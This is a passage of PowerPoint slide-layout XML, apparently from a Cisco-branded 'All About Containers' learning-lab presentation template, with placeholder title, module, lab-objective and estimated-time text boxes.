    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg2"/>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69497" y="3856737"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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7" y="4072670"/>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7" y="4348763"/>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3" y="3043654"/>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1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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dirty="0"/>
              <a:t>Module Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425766"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lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Presentation Title Goes Here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FEF53B4-FCFE-924B-AA4A-AB56BBF1AAA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>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a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="425765" y="52809"/>
            <a:ext cx="2540384" cy="1838808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{254DBBAF-BF48-0C4E-9336-2D3C70D1F53E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:alpha val="34000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48881DA9-736F-3D4A-B962-E7BD6AF257EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="1823225"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39875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DCI Title">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432958-3DAC-1540-8377-CD6910C8AD8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224"/>
            <a:ext cx="9144000" cy="5163057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469497" y="3856737"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4072670"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4348763"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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3" y="3043654"/>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2"/>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dirty="0"/>
              <a:t>Module Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425766"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2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Presentation Title Goes Here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BF87238-9584-4547-92FF-1D7CD0E8CD8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69496" y="237203"/>
            <a:ext cx="2209800" cy="1504950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13201F20-7B4F-7E40-B929-A1315CB892A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D7A8714-83C0-0F49-8386-11EE793A7854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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31277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DNA Title">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg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739AC88-612D-1948-AA17-2DAEC68C8E1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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469497" y="3856737"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4072670"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4348763"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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3" y="3043654"/>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2"/>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dirty="0"/>
              <a:t>Module Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425766"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2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Presentation Title Goes Here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC36B60-D600-084C-9EF6-AEEC009AA89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69496" y="237203"/>
            <a:ext cx="2209800" cy="1504950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4094B60-2871-9341-B801-C0F6F1FDA47D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E877783-76FF-F048-8454-17BA1B5373C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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5100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CC Title">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="bg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A7B0B21-F5A7-FA4F-B0FC-EE18261F9D2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9109363" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469497" y="3856737"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4072670"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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7" y="4348763"/>
            <a:ext cx="8296421" cy="288131"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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3" y="3043654"/>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2"/>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dirty="0"/>
              <a:t>Module Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="425766"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2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Presentation Title Goes Here</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F632583B-88DD-EF4C-AA22-01FA30D97C0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69496" y="237203"/>
            <a:ext cx="2209800" cy="1504950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09775AD1-8CDE-8646-9667-6A5438C4C4A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE063E5F-50C9-084E-8F8E-FA921FA4FE3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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3150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NE Module Intro">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437766" y="341314"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNE Module URL (https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>learninglabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Picture Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA2741B3-4C07-2F4B-AC2B-7887DE739F4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1284890"/>
            <a:ext cx="8345488" cy="3263586"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learning Lab Module Image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13342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Hands On Exercise">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437766" y="637382"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNE Lab Title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591D7585-EC32-AF4B-AC6D-18D793602D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="1888761"/>
            <a:ext cx="4022068" cy="2478452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objectives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59F7CAC2-E697-0447-A314-412B22FAD525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362607" y="315630"/>
            <a:ext cx="2329484" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-on Exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80BB0379-7718-0448-AE43-29AB7AF168A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5880510" y="341136"/>
            <a:ext cx="2902744" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="142872" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="261931" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="333367" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="404802" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Estimated Time: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
